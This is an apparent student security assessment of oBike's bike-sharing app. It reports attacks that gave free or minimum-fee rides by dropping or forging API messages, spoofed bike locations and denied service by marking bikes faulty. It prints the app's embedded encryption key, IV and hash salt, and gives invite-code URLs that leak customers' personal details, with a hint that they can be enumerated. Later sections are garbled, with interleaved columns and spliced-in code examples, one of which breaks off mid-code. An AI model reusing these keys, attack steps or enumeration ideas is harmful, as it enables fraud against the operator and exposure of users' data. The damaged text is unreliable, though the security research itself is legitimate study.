Keywords
Internet of Things

1. INTRODUCTION
Bike Sharing System is a service where bicycles are made available for users to share and use for a short period of time. It is a relatively new system brought into Singapore which started to gain media attention and traction in early 2017. The wide availability of rental bicycles and its low cost has proved to be popular with the masses. In order to offer low prices to its customers, bike sharing companies will have to minimize their operating costs. Cost-cutting measures include reducing the budget for the development and maintenance of a secure system for renting bicycles, resulting in the existence of vulnerabilities which we will uncover in this paper.

At the moment, there are three major bike sharing companies that are operating in Singapore, namely oBike, Mobike and Ofo. oBike’s system was chosen in the search of weaknesses and vulnerabilities for this paper.

2. BIKE SHARING PROCESS
In order for a user to rent a bicycle from a bike sharing company, the user has to download an app created by the bike sharing company and register an account on the app. Upon completing the registration process, the user is prompted to place a deposit before he can start renting a bicycle.

Next, the app will show the location of bicycles available for rent around the user. The user will then walk towards one of the bicycles and scan the QR code on its lock. The app will do a series of background actions (detailed in the following sections) and the bike will be physically unlocked. Each account is only allowed to unlock/rent at most a single bike at any point in time.

2.1 Unlocking the Bicycle
When the user scans the QR code, the app sends a request to the bike sharing company’s API. Parameters such as the bicycle’s Bike ID and the User’s ID are attached to the request. The request is encrypted before it is sent to the API.

The app will then receive an unencrypted response, upon which the app parses the response and determines whether the server has approved the request to unlock the bike or not. In the case of it being approved, the response will contain the bike unlock keys.

The app will then package the keys in an encrypted BTLE message and send it to the bike, releasing the lock on the bicycle.

The lock will then send a BTLE message back to the app, informing the app that the bicycle has been successfully unlocked. The app will then send a request to the API (acknowledgement packet), informing the server that the bicycle is now in use. At this point, the app will reflect a new ride being started and the unlock button will be disabled.

There are also instances when the unlocking process fails. In this case, the app also sends a request to the API, but informs the server that the unlocking process has failed instead. The unlock button in this scenario will remain unlocked and the user can either try again or try to scan the code of another bike.

2.2 Locking the Bicycle
Upon completing the ride, the user will push a lever to lock the bike. The lock will then send a BTLE message back to the app, informing the app that the bike has been locked. The app will also send a request back to the API, informing the server that the bike is now locked, placed at that particular location and is available for the next user.

3. TECHNICAL DETAILS

3.1 System Architecture
As can be seen from the diagram, the bike does not seem to have any connection/communication channel with the server. Everything goes through the phone. The phone acts as a relay between the bike and the server.

3.2 BTLE Message Structure
Bike’s BTLE device manufacturer: Texas Instruments
Packet Size: Ranging from 14 - 31 Bytes

Updating bike internal coordinates:

Updating bike internal coordinates (Continued):

Presumably the unlock code:

Presumably the unlock code (Continued):

3.3 API Requests & Responses
API Endpoint:
https://mobile.o.bike/api/v2/CATEGORY/ACTION
Example APIs:
https://mobile.o.bike/api/v2/bike/060508811/lockNo
https://mobile.o.bike/api/v2/member/account
https://mobile.o.bike/api/v2/bike/unlockPass

Request Method: POST
Request Type: JSON
Request Body: Single ‘value’ field containing an encrypted string
Response Type: JSON
Response Body: Plaintext

4. PLANNING THE ATTACKS
The team had set forth the following objectives in our exploration for weaknesses in oBike’s bike sharing platform:

1. Unauthorized Bike Unlocking (Primary Objective)
2. Request Forgery
3. DoS Attacks

Through initial research and investigation, several links within the system architecture have been identified to potentially contain weaknesses/vulnerabilities. These links are identified to be the communication channel between the server and the app, which communicates with API requests and responses, and the communication channel between the app and the bike, which communicates via BTLE.

After having identified these links, coupled with the knowledge of how the sharing system works, the team has come up with a list of potential attacks that might expose vulnerabilities and system flaws. These potential attacks include:

App to Bike
● Replaying of BTLE messages from a previous session
● Sending of forged BTLE messages

App to Server
● Interfering with API requests (e.g. blocking of acknowledgement packet, etc.)
● Modifying API responses to enable certain features of the app (client sided) and checking for server side validation
● Updating the server with fake location data of a bike (location spoofing)
● Sending lock API request directly after unlocking (minimum fee ride)
● Sending multiple API requests to the server containing random/malformed data
● Sending API requests that would trick the server into thinking the bike is faulty
● Sending API requests to reserve multiple bikes indefinitely
● Session Hijacking

5. EXECUTION

5.1 Replaying of BTLE messages from a previous session
One of the very first attacks attempted was a BTLE replay attack. Since the app and the bike communicate purely through BTLE, intuitively the replay attack came into focus. In order to carry out the attack, the team used an open source Python script (BLE-Replay) to replay BTLE packets captured on an Android phone that had recently unlocked a bike through the oBike app.

The packets were first verified to be captured with proper formatting before being put through the script. In addition, in order to reduce the chances of a false negative, packets of 3 separate bikes were captured and the 3 bikes were physically positioned side by side in range of the attack machine. The packets were then put through the script for the replay attack to be carried out.

After running the script, there was no visible change/movement on the bike locks. The attack had failed.

5.2 Sending of forged BTLE messages
By just observing the packets captured, it is clear that with the exception of the update location packet, other packets looked gibberish. Thus, in order to forge or modify the BTLE messages, one would first have to find out how the messages were encrypted and decrypted.

In order to fully understand what the packets are conveying, the oBike app is decompiled to give a bare view of the source code and its internal operations. The decompiled source code has rename obfuscation applied, making understanding the app’s internal workings a challenge.

Regardless, scouring, tracing and guessing through the source code has led the team to believe that part of the gibberish packets are encrypted. However, as the decompiled source code is not the exact source code, many segments of code are left uninterpreted or not fully understood. Eventually, the team was not able to decrypt the packets nor send any forged BTLE messages.

5.3 Interfering with API requests
Attacks on the communication channel between the app and the server were conceived. It was hypothesized that blocking certain API requests may confuse the server into thinking that the bike is still locked even though the bike is already physically unlocked.

The bike application acts as the communication medium between the BTLE device (bike) and the server. This architecture exposes it to MITM attacks where the attacker can create, modify and drop packets.

Attempts were made to get free rides. These attempts were done through dropping packets that were meant to be sent to the server as acknowledgement for the start and end time of the journey. Interfering with the API requests was possible through setting a proxy between the application and the server.

Upon going through our proxy logs, 3 instances across 2 different APIs where the acknowledgement packet/request was being sent were determined. Firstly, during the initial unlocking of the bike through the lockMessage API. Secondly, during the physical locking of the bike also through the lockMessage API. Lastly, in the event where the app did not receive a response from the server after sending the acknowledgement packet/request described above, a fail safe mechanism would retry and send the acknowledgement packet again through the hisLockMessage API when the app is restarted. Hence upon uncovering these instances, we are now ready to put our hypothesis to the test.

Steps taken and things tried:
Step 1: Setup a proxy to view and set rules to filter specific packets.
Step 2: Scan the QR Code to unlock the bike.
Step 3: Confirm physical unlock of bike - First Instance
Step 5: Check and confirm that our proxy dropped the acknowledgement packets/requests.
Step 4: Check if app started a ride (recorded a start entry)
Step 5: After using the bike, manually lock the bike. - Second Instance
Step 6: Check and confirm that our proxy dropped the acknowledgement packets/requests
Step 7: Check if any ride was recorded as history in the application.
Step 8: Restart the app - Third Instance
Step 9: Check and confirm that our proxy dropped the fail safe acknowledgement packets/requests
Step 10: Check that no ride was started and no ride was recorded as history in the application.

At each of those instances, the API request for the acknowledgement packet/request was successfully blocked, and the ride was not recorded anywhere on the app or the server. This serves as proof that the attempt to gain a free ride by interfering with API requests was a success.

However, subsequently after the hack, it was found that the extent of the hack extends way more than just gaining a free ride. It seems that due to the blocking of the acknowledgement packets/requests, the server mistakenly deems the bike as being faulty. Hence, once the hacked bike is locked, it would not be possible to unlock it again (server returns ‘faulty bike’ error message) until either the admin manually resets the faulty status of the bike or a timeout happens on the server side. Through observation, the timeout seems to be the next day. Meaning to say if a bike was hacked on Monday (regardless of time), it would only be available again on Tuesday (regardless of time).

5.4 Modifying API responses to enable certain features of the app (client sided) and checking for server side validation
oBike’s users are categorized under paid users and free users. Free users are unable to rent any of the bikes. Free users only have the ability to deposit money while paid users have access to all features within the app. These features include scanning the QR code and unlocking of bikes. As the app relies on the API response to make this distinction, it is theoretically possible that the features are only restricted on the client side.

To put that theory to the test, a free account was used and API responses were modified before the app received them. Initial results show the user interface adapting to the change and unlocking certain buttons that only paid users have access to. However, upon trying to unlock the bike, an error message is prompted, asking the user to deposit money. Hence, it seems that while the app acts as a gatekeeper or coordinator of which API request is available, the final validation still lies on the server side.

5.5 Updating the server with fake location data of a bike
Because it is possible to communicate directly with the API, there are plans to craft requests that would interfere with how the system normally works. One such request planned was to tamper with the location data which will be sent by the phone when the bicycle is locked. This way, the location of the bicycle received by the server is no longer accurate. Other users will not be able to find the bicycle at the location reflected on their app.

Steps taken or things tried:
Step 1: Setup a proxy to sniff the packets.
Step 2: Unlock the bicycle.
Step 3: Lock the bicycle.
Step 4: Intercept location update packet, decrypt, modify the location coordinates then encrypt.
Step 5: Send the modified packet to the server.
Step 6: Confirm that the location has been updated in the server through reloading the app.

Upon reloading the application, the location of the targeted bike has been updated to the set location coordinates.

Alternatively, if a user does not have a means of decrypting packets, which the above relies on, the user can also fake the phone’s internal GPS coordinates through various other apps on the market. The oBike app would likewise be unable to tell if the location was spoofed or not.

Another way of changing the location data can be done through physical means. When the bicycle is moved from one location to another without unlocking the bicycle, the location data stored in the server will not be updated, thus resulting in inaccurate information for the bikers.

5.6 Sending lock API request directly after unlocking
Another attack conceived was to craft and send fake API requests in an attempt to gain rides at minimum cost. First, the user has to unlock the bicycle through the app. The app sends some API requests and a ride is started. As the cost of the ride increases as the rental time increases, the attack attempts to send an acknowledgement packet/request immediately after the bike is unlocked. This would ensure that the rental time is almost close to zero and the user would only have to pay the minimum fee.

To do so, the user sends a crafted/forged request indicating the bicycle is locked without physically locking the bicycle. That way, the server will be tricked into thinking the bicycle is locked, while the bike remains unlocked. The user can then ride the bicycle for an indefinite period of time without paying for the extra time and also without the server knowing.

Through carrying out the actual attack, the assumptions and idea were confirmed. The attack worked as expected and all rides only cost $0.50 (minimum fee).

5.7 Sending multiple API requests to the server containing random/malformed data
Through observing the proxy logs and also the decompilation of the app, a complete list of APIs currently in use by the app can be discovered. While it is unknown as to what this attack might reveal, what is generally looked out for are holes within the validation mechanisms that the server might have in place when dealing with API requests. These holes may come in the form of explicit error messages that might reveal server/code details. It may also present itself as a heavy operation that takes a long time to return a response or a malformed request that was not rejected when it should have been.

The attack is carried out in 3 stages.

Firstly, API requests were edited to contain missing or extra fields that the server might or might not expect. However, this approach saw no loophole within the validation mechanism. Missing values were flagged with a generic error message while extra fields seem to be simply ignored.

Secondly, API requests were edited to contain correct fields with incorrect/malformed values. Some strategies were used when changing the values. Values were changed to out of bound values, SQL injections and logically impossible values (e.g. timestamp was changed to 10 years ago). Unexpectedly, 2 of these edits were not flagged by the system. 1 of the 2 edits was changing the timestamp of when a ride started; it resulted in the account being bugged and having a ride with a negative ride time. The other edit was the server accepting impossible GPS coordinates.
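Sections 5.3 and 5.7 report that a dropped acknowledgement leaves no ride on record and that edited timestamps and impossible coordinates were accepted; Section 5.5 reports unchecked location updates. The following added example (not oBike's code) sketches server-side handling that opens the ride when the unlock keys are issued and validates each lock report against the server clock. All names, the clock-skew tolerance and the speed bound are assumptions, and the scenario data is constructed.

```python
import math
from dataclasses import dataclass
from typing import Optional

MAX_SKEW_S = 120       # assumed tolerance between phone clock and server clock
MAX_SPEED_MPS = 15.0   # assumed upper bound on bicycle speed for plausibility checks

class Rejected(Exception):
    """A report failed server-side validation; the message is the reason."""

@dataclass
class Ride:
    account: str
    bike: str
    start: int                 # server time (s) when the unlock keys were issued
    lat: float                 # last accepted bike position at unlock
    lon: float
    end: Optional[int] = None  # server time (s) when the lock report was accepted

def distance_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres (haversine)."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    a = (math.sin((p2 - p1) / 2) ** 2
         + math.cos(p1) * math.cos(p2) * math.sin(math.radians(lon2 - lon1) / 2) ** 2)
    return 2 * 6371000.0 * math.asin(math.sqrt(a))

class RideLedger:
    def __init__(self, bike_positions):
        self.pos = dict(bike_positions)  # bike id -> (lat, lon) last accepted
        self.open = {}                   # bike id -> Ride in progress
        self.history = []                # closed rides

    def issue_unlock(self, account, bike, now):
        """Open the ride when the keys leave the server, not when the app acknowledges."""
        if bike in self.open:
            raise Rejected("bike already in use")
        if any(r.account == account for r in self.open.values()):
            raise Rejected("account already has an open ride")
        lat, lon = self.pos[bike]
        self.open[bike] = Ride(account, bike, now, lat, lon)

    def report_lock(self, account, bike, client_ts, lat, lon, now):
        """Validate a lock report and close the ride; returns billable seconds."""
        ride = self.open.get(bike)
        if ride is None or ride.account != account:
            raise Rejected("no open ride for this account and bike")
        if not (-90.0 <= lat <= 90.0 and -180.0 <= lon <= 180.0):
            raise Rejected("coordinates out of range")
        if abs(client_ts - now) > MAX_SKEW_S:
            raise Rejected("client timestamp too far from server time")
        elapsed = now - ride.start   # billed from the server clock, never the client's
        if distance_m(ride.lat, ride.lon, lat, lon) > MAX_SPEED_MPS * max(elapsed, 1):
            raise Rejected("implausible displacement")
        ride.end = now
        self.pos[bike] = (lat, lon)
        self.history.append(self.open.pop(bike))
        return elapsed

def demo():
    """Constructed scenario: the acknowledgement is never sent, then four lock reports."""
    ledger = RideLedger({"BIKE-1": (1.2966, 103.7764)})
    ledger.issue_unlock("alice", "BIKE-1", now=1000)
    reports = [
        dict(client_ts=1600 - 315360000, lat=1.2970, lon=103.7770),  # ten years ago
        dict(client_ts=1600, lat=123.0, lon=103.7770),               # impossible latitude
        dict(client_ts=1600, lat=1.4500, lon=103.8200),              # about 17 km in 10 min
        dict(client_ts=1598, lat=1.2970, lon=103.7770),              # plausible
    ]
    outcomes = []
    for r in reports:
        try:
            outcomes.append(ledger.report_lock("alice", "BIKE-1", now=1600, **r))
        except Rejected as why:
            outcomes.append(str(why))
    return ledger, outcomes

if __name__ == "__main__":
    print(demo()[1])
```

Because the phone is the only relay between lock and server, these checks bound what a report can claim but cannot prove that the bike was physically locked.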

Lastly, random API requests were sent to non-existent API end-points. Expectedly, none of the attempts yielded anything useful. A generic error message was returned.

5.8 Sending API requests that would trick the server into thinking the bike is faulty
Apart from the vulnerability found in API Interference (Section 5.3), attempts were made to achieve similar results in tricking the server to think that the bike was faulty. When a bike is deemed as faulty, the server rejects all attempts to unlock the bike. Hence, if the server can be tricked, a denial of service attack is achieved.

As the app contains a ‘report problem’ function, an idea to use it to render a bike ‘faulty’ was conceived. The idea was tested but the results varied. In some instances, the attack seemed to work after a period of time; however, in other instances, nothing seemed to have changed. It is unclear if the bike status was manually changed by the admin or by some automated code.

Another idea tested out was to try sending unlock API requests for a single bike using 2 different accounts. The results showed that when an account sends the unlock API request, the bike is bound to that account for the duration of the ride, and any additional requests are rejected. Hence, this approach was not able to achieve a faulty status.

5.9 Sending API requests to reserve multiple bikes indefinitely
One of the features offered by the oBike app is the ability to reserve bikes. Each account is supposedly only able to reserve a single bike at any moment. Reserved bikes are only unlockable by the user that reserved them. Reserved bikes will remain reserved for a period of time until a timeout occurs or the user unlocks them. Hence, if a vulnerability is found within the reservation sub-system, then a denial of service attack might be possible.

In order to carry out the attack, reserve API requests were logged. Then multiple bike ids are recorded. With these 2 pieces of information, the attack is ready. The idea is to send multiple reserve API requests with different bike ids using the same account. Upon carrying out the attack, error messages were returned after the first reserve API request was sent. Through this result, it would seem that the server validates each reservation request and checks if the account has a prior reservation.

5.10 Session Hijacking
The current system requires users to pay a fixed sum of deposit before they are able to use oBike’s service. To bypass this system, free users can make use of a paid user’s session id to use the service (inspired by firesheep). This is done through crafting the packets with the paid user’s session id before calling the API. The limitation of this form of attack is that the session id can only last as long as the server sets it to be.

The likelihood of such an attack is very low as API requests are encapsulated in the https protocol, which makes sniffing of session ids close to impossible. However, by combining other attacks, session hijacking might be useful (discussed in section 7.1).

6. ADDITIONAL FINDINGS

6.1 API Encryption and Hash Techniques, Secret Keys and IV
One major challenge when creating/forging API requests was the encryption. Since the request was encrypted, any manipulation of the encrypted string can be immediately detected and rejected by the server. However, as part of the process of uncovering the BTLE encryption (see section 5.2), certain comments left by the developer in the decompiled source code were discovered. In particular, a comment left by the developer "/* compiled from: APIEncryptHelper */" was discovered, which eventually led to the understanding of how packets/requests between the app and the server were encrypted.

Encryption Technique
The request body is first converted into hex. The converted hex string is then encrypted using an encryption scheme, key and iv. Next, a hash value is calculated by hashing the request body appended with ‘&’ + key [hash(request-body&key)].

However, knowing just the technique isn’t enough. There are still unknown elements that are not found. These unknown elements include the encryption scheme, key, iv and hash scheme and key. Through further digging and tracing, it is discovered that all of our unknown elements reside in an external library stored somewhere within the app.

Subsequently, the library is located and disassembled using IDA Pro. After analyzing the strings within the disassembled library, certain strings stood out.

After some trial and error, all of the unknown elements are found.

Encryption Scheme Type: Symmetric
Encryption Used: AES/CBC/PKCS5Padding
Key Used: oBAddMYFUzLed243 (oBAddMYFUzLed + app version number)
IV Used: 1234567890123456

Hash Used: SHA-1
Salt Used (appended to request data): &oBaddX4buhBMG243 (& + oBaddX4buhBMG + app version number)

every bike in the system to become ‘faulty’, achieving a service wide denial of service attack.
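The integrity value described in section 6.1 is keyed only by a constant that ships inside the app, so it identifies no sender and carries no freshness. The following added example (not oBike's code) sets that construction beside an HMAC keyed per login session with a timestamp and nonce. The constant is a constructed placeholder, and the session ids, bodies and the 30-second window are assumptions. A per-session key binds a request to an account and stops replays; it does not make the account holder's own reports trustworthy, which still needs server-side validation.

```python
import hashlib
import hmac
import secrets

APP_CONSTANT = "PLACEHOLDER-CONSTANT"  # constructed stand-in for a value shipped in every app build

def app_constant_tag(body):
    """Integrity value as described in section 6.1: SHA-1 over body + '&' + constant."""
    return hashlib.sha1((body + "&" + APP_CONSTANT).encode()).hexdigest()

def constant_verify(body, tag):
    """Server check for the app-constant scheme: no session, time or nonce is involved."""
    return hmac.compare_digest(app_constant_tag(body), tag)

def sign(key, body, ts, nonce):
    """HMAC-SHA256 over timestamp, nonce and body with a per-session key."""
    msg = "\n".join([str(ts), nonce, body]).encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()

class SessionVerifier:
    """Server side: one random key per login session, freshness window, nonce cache."""

    def __init__(self, max_age_s=30):
        self.max_age_s = max_age_s
        self.keys = {}   # session id -> key handed to the client over TLS at login
        self.seen = {}   # session id -> nonces already accepted

    def login(self, session_id):
        self.keys[session_id] = secrets.token_bytes(32)
        self.seen[session_id] = set()
        return self.keys[session_id]

    def verify(self, session_id, body, ts, nonce, tag, now):
        key = self.keys.get(session_id)
        if key is None:
            return "unknown session"
        if not hmac.compare_digest(sign(key, body, ts, nonce), tag):
            return "bad tag"
        if abs(now - ts) > self.max_age_s:
            return "stale"
        if nonce in self.seen[session_id]:
            return "replayed"
        self.seen[session_id].add(nonce)
        return "ok"

def demo():
    """Constructed requests; session ids, bodies and timestamps are sample values."""
    server = SessionVerifier()
    key_a, key_b = server.login("sess-a"), server.login("sess-b")
    body = '{"bikeId":"BIKE-1","action":"lock"}'
    edited = '{"bikeId":"BIKE-2","action":"lock"}'
    old_tag = app_constant_tag(body)
    n1, n2, n3 = (secrets.token_hex(8) for _ in range(3))
    tag = sign(key_a, body, 1000, n1)
    return {
        # App-wide constant: the same message verifies any number of times,
        # and an edited body verifies for anyone who holds a copy of the app.
        "constant_replay": constant_verify(body, old_tag) and constant_verify(body, old_tag),
        "constant_edit_by_any_app_holder": constant_verify(edited, app_constant_tag(edited)),
        # Per-session HMAC with timestamp and nonce.
        "hmac_valid": server.verify("sess-a", body, 1000, n1, tag, now=1005),
        "hmac_replay": server.verify("sess-a", body, 1000, n1, tag, now=1006),
        "hmac_edited_body": server.verify("sess-a", edited, 1000, n2, tag, now=1006),
        "hmac_other_session_key": server.verify(
            "sess-a", body, 1000, n2, sign(key_b, body, 1000, n2), now=1006),
        "hmac_stale": server.verify(
            "sess-a", body, 1000, n3, sign(key_a, body, 1000, n3), now=2000),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```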

6.2 User Data Leak
During the execution process, a vulnerability that may have a significant impact was discovered. This vulnerability leaks personal information about oBike’s customers, such as their name, mobile phone number and email address. While this was not one of the planned attacks, it is believed that the impact is significant enough and deserves a mention in the paper.

Examples:
https://mobile.o.bike/api/v1/member/coupon/invite?inviteCode=2093818400
https://mobile.o.bike/api/v1/member/coupon/invite?inviteCode=1709071327513973

Furthermore, as the system seems to use only integers for its invite codes, attackers can potentially run a loop to try a range of integers and farm personal details.

7. HYBRID ATTACKS

7.1 Session Hijacking + API Interference
Using session hijacking, it will be possible to allow a free user to use the features that are available to only paid users (unlocking of bikes). Together with the technique described in the API Interference segment (Section 5.3), a free user will be able to use the service for free while the paid user’s account will not be affected.

8. EVALUATION OF ATTACKS
With the successful attacks documented in the previous sections, we were able to achieve our main objective of obtaining unauthorized bicycle unlocking. In addition, attacks such as spoofing the location of the bicycle, offering free rides to an attacker or even allowing him to gain access to sensitive information were also found. However, while each attack exposes certain flaws within the system, the severity of each attack varies.

In our evaluation, we will evaluate each attack according to its likelihood of occurring and its impact. The likelihood of the attack occurring is how easy it is for someone to replicate the attack. The impact of the attack is a measure of how much damage it can cause to oBike as a company and/or the ability of the users to use the service effectively.

8.1 Location Spoofing
With a set of simple instructions and some tools, an attacker can easily replicate this attack. Because of that, it is easy for most people to carry out this attack. It is highly likely that this has already been done by other attackers before due to its simplicity. As such, the likelihood of this attack is high.

On top of that, location spoofing prevents users from getting the accurate location information of each bike. Users may think that there are no bicycles available in their vicinity, therefore opting to use another form of transport and cause a loss of revenue to oBike. It can also hinder oBike’s maintenance efforts as they are
This​ ​is​ ​a​ ​win​ ​for​ ​the​ ​hacker​ ​at​ ​the​ ​expense​ ​of​ ​the​ ​company. unable​ ​to​ ​locate​ ​and​ ​perform​ ​maintenance​ ​on​ ​their​ ​bicycles.
In the worst case scenario, an attacker can choose to spoof the
location of a very large number of oBikes. Users relying on the
7.2 MITM​ ​+​ ​API​ ​Interference app to locate a bicycle will not be able to do so, undermining the
This attack comes with a unique twist. The hacker in this attack user’s confidence in the reliability of the bike sharing system.
will be the paid user. The hacker can setup a proxy where free This loss of confidence can prove to be detrimental to oBike’s
users would connect to. The hacker can then modify free users’ growth as a company. The potential impact of this attack can
responses by sending a API request of his own. In the case of make​ ​is​ ​high.
unlocking the bike, the API request to get the unlock code will be
different for free and paid users. However, the hacker’s response With a high likelihood of this attack occurring and a high impact
(paid user) will then replace the free users’ response, allowing the it​ ​can​ ​potentially​ ​make,​ ​the​ ​overall​ ​severity​ ​of​ ​this​ ​attack​ ​is​ ​high.
free user to unlock the bike. In order for the hacker to not bear the
cost of the ride, the hacker can also use the API Interference
technique​ ​to​ ​mitigate​ ​the​ ​trip​ ​cost. 8.2 Unauthorized​ ​Unlocking
Again, with a set of simple instructions and some tools, an
attacker can easily replicate this attack. The simplicity of the
execution of this attack makes the likelihood of this attack to be
7.3 Map​ ​Surfing​ ​+​ ​API​ ​Interference high.
This attack potentially has the greatest impact on the oBike’s
business. oBike provides an API that returns a list of bikes within This attack actually allows a user to use the bicycle without
the radius of a certain location. This API is used to populate the paying for it. If this attack distributed to the masses, oBike’s main
bike finder feature they have implemented in their app. Along source of revenue will be cut off. oBike will experience heavy
with​ ​the​ ​location​ ​of​ ​the​ ​bike,​ ​the​ ​API​ ​also​ ​return​ ​the​ ​bike​ ​ids. losses​ ​and​ ​might​ ​not​ ​even​ ​be​ ​able​ ​to​ ​continue​ ​to​ ​run​ ​as​ ​a​ ​business.
Now that the bike ids are known, the attack can be carried out. By With a high likelihood of this attack occurring and a very high
leveraging on the vulnerability to make bike appear ‘faulty’ impact it can potentially make, the overall severity of this attack is
(section 5.3), we can craft fake unlock requests for each and every very​ ​high.
of these bikes and since the unlock process didn’t actually happen
there will be no acknowledgement request being generated and
sent to the server. This results in all of the bike being set to the
‘faulty’ status. Using this method, it would be possible to set

8.3 Denial of Service
With carefully crafted requests sent to the server (section 5.3 & section 7.3), the server may determine that the bicycle is faulty and will no longer accept any more attempts to unlock it, be it legitimate or not, until after a certain period of time.

The likelihood of this attack is low since it requires a moderate level of technical expertise in crafting the requests. It will take a significant amount of effort for a layman to replicate this attack.

As for the impact of this attack, it goes without saying that this is a serious issue. The service-wide denial of service would not only paralyze the business but would also do great harm to the reputation of the company. Customers would steadily lose confidence in the company and would request their refunds. This might make the company go out of business.

While the likelihood of this attack is low, the consequences of the attack are devastating. Hence, the overall severity of this attack is very high.

9. RECOMMENDATIONS
From the attacks described above, it is clear that the success of these attacks revolves around 5 main weaknesses within oBike's implementation and architecture.

1. Weakness in security through obscurity of app source code. By decompiling the app, attackers can easily understand the internal workings (comments are left inside and only the rename obfuscation technique is applied).
2. Flaw in oBike's unlock protocol/logic. The unlock protocol/logic places too much trust and power on the user.
3. Weakness in encryption scheme used. Symmetric encryption is used to send requests to the server. This can be easily broken if the secret key is found.
4. Weakness through bad practice. Secret key and salt hashes are embedded within the application in plaintext, allowing attackers to easily discover them.
5. Weakness in choice of communication channels. Due to the bike not being in communication with the server, all data have to be relayed through the app. This inherently exposes the entire architecture to MITM attacks.

Our recommendation targets the 5 weaknesses detailed above.

9.1 Turn Up the Obfuscation
After decompiling the app, many details regarding the internal workings were revealed. Although rename obfuscation (section 5.2) was applied, it was a weak measure against efforts to reverse engineer. More notably, the comments left in the decompiled source shed light on much of how information is processed within the app, which included how requests and data were encrypted. As such, it is recommended for the following measures to be applied on top of what is already implemented.

1. Apply Control Flow Obfuscation (Android ProGuard, PreEmptive Solutions, etc.), adding noise to the code to make the code difficult for humans to understand
2. Apply String Obfuscation (Android ProGuard, PreEmptive Solutions, etc.), making as much of the code unreadable as possible
3. Compile without debug symbols; this would remove all comments within the built app

Shortcomings:
Obfuscation makes the code difficult to understand, but not impossible to understand. With ample time, the attackers can still understand the source code.

9.2 Improving the Unlock Protocol
As introduced earlier, after the user unlocks the bike, the app will send the acknowledgement packet to the server. After that, the server will record the acknowledgement packet and start to charge the user's account. However, it was also mentioned that attackers could block the acknowledgement packet to use the bike without being charged.

Hence, it is recommended that the server starts charging, or at least starts recording a trip as started, upon sending the bike unlock keys instead of only after the acknowledgement packet is received. This way, it protects the business interest of the company and at the same time, attackers would be charged regardless. Since it is inevitable for the attacker to request the bike unlock keys, it means that charging cannot be avoided. Purposefully blocking any packets in the later stages will only result in a higher cost.

However, some may argue that in the event of a legitimate failed unlock process, users will still be unfairly charged. The solution to that would be simple. The acknowledgement packet would relay the status of the unlock process and the server can choose to waive whatever charges have been incurred.

The new unlock protocol described above would not only ensure that there would be no incentive to block the acknowledgement packets but would also ensure that the business interest is preserved in any situation. In addition, gaining free rides would no longer be as easy as blocking/dropping packets. Attackers would now have to craft/forge acknowledgement packets that falsely indicate a failed unlock process. This would require intimate knowledge of how requests are encrypted and also the secret keys and salts. While this is by no means foolproof, it significantly increases the difficulty of attacking the protocol.

Shortcomings:

An attacker with the knowledge of the secret keys and salts can still gain free rides.

9.3 Preventing Users from Decrypting Packets/Requests
After decompiling the app, the secret keys used in encrypting requests were exposed. It was also revealed that a symmetric encryption scheme was used. In other words, a full break was achieved. Asymmetric encryption would be a better choice. Even after intercepting the packets/requests sent to the server, without the private key, which would only be stored in the server, it would not be possible to decrypt the contents in a reasonable amount of time. It would be hard to forge packets with valid content without knowing the format of the plaintext. It would take a lot more time and effort on the attacker's part.

Shortcomings:
If the decompiled source code was understood completely, it would be easy to find the format of the plaintext by checking relevant APIs.

9.4 Applying Industry's Best Practice
Instead of storing secret keys in plaintext inside an external library, it is recommended to use the Android Keystore system. The Android Keystore system lets you store cryptographic keys in a container to make it more difficult to extract from the device. Once keys are in the keystore, they can be used for cryptographic operations with the key material remaining non-exportable. Moreover, it offers facilities to restrict when and how keys can be used, such as requiring user authentication for key use or restricting keys to be used only in certain cryptographic modes. In iOS, Keychain Services is recommended. Keychain Services provides secure storage of passwords, keys, certificates, and notes for one or more users. A user can unlock a keychain with a single password, and any Keychain Services-aware application can then use that keychain to store and retrieve passwords.

9.5 Rethinking App Privileges
The app holds all power and communication between the server and the bike. Because of this, the server is at the mercy of the app. Hence, instead of letting the app play the middleman, the company can consider installing additional hardware, so that the server and the bike can have direct communication.

Possible solutions could include only allowing bikes to lock/unlock at stations (which communicate directly with the server) built by the company or, alternatively, bikes may connect to the server using the 3G network. It will be much harder to attack as compared to an app, which can be easily decompiled and intercepted.

Shortcoming:
The cost will be much higher. Battery issues due to additional power requirements to power up additional components.

10. PROJECT CHALLENGES

10.1 Unfamiliar with BTLE
BTLE is a relatively new technology, coupled with the fact that Bluetooth has relatively low usage in the daily lives of most people. This has led to only a surface-level understanding of how the technology works, which has proven to be a challenge for the project.

10.2 Decompiled Source Code
The decompiled source code of the app was difficult to understand. The flow of the program was hard to trace.

11. ACKNOWLEDGEMENTS
We would like to thank Dr. Hugh Anderson for his unwavering support and guidance towards our project.

12. REFERENCES
https://github.com/nccgroup/BLE-Replay
https://smartlockpicking.com/slides/HITB_AMS_2017_Blue_Picking_-_Hacking_Bluetooth_Smart_Locks.pdf
http://processors.wiki.ti.com/index.php/BLE_sniffer_guide
https://www.preemptive.com/obfuscation
https://developer.android.com/training/articles/keystore.html
https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html

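The change recommended in section 9.2, modelled as an added Python example (not oBike's server code): the same three constructed sessions are replayed under the original rule, where billing starts on the app's acknowledgement, and under the recommended one, where it starts when the unlock key is sent and a reported failed unlock waives the charge. Times are in minutes, the tariff and all class and method names are hypothetical, and the per-account waiver counter is an addition here so that repeated failed-unlock reports stay visible to the operator.

```python
from dataclasses import dataclass
from enum import Enum
from typing import Dict, Optional


class Policy(Enum):
    CHARGE_ON_ACK = "original"       # billing starts when the app's acknowledgement arrives
    CHARGE_ON_ISSUE = "recommended"  # billing starts when the unlock key is sent


@dataclass
class Trip:
    user: str
    issued_at: int                    # minute the unlock key was sent
    started_at: Optional[int] = None  # minute billing began
    ended_at: Optional[int] = None    # minute billing stopped
    waived: bool = False


class UnlockServer:
    RATE_PER_MINUTE = 1  # constructed tariff, not oBike's pricing

    def __init__(self, policy):
        self.policy = policy
        self.trips: Dict[str, Trip] = {}
        self.waivers: Dict[str, int] = {}  # per-account count of waived trips

    def issue_unlock_key(self, trip_id, user, now):
        trip = Trip(user=user, issued_at=now)
        if self.policy is Policy.CHARGE_ON_ISSUE:
            trip.started_at = now  # the key request cannot be skipped, so neither can this
        self.trips[trip_id] = trip

    def acknowledge(self, trip_id, unlocked, now):
        trip = self.trips[trip_id]
        if unlocked:
            if trip.started_at is None:
                trip.started_at = now
        elif not trip.waived:
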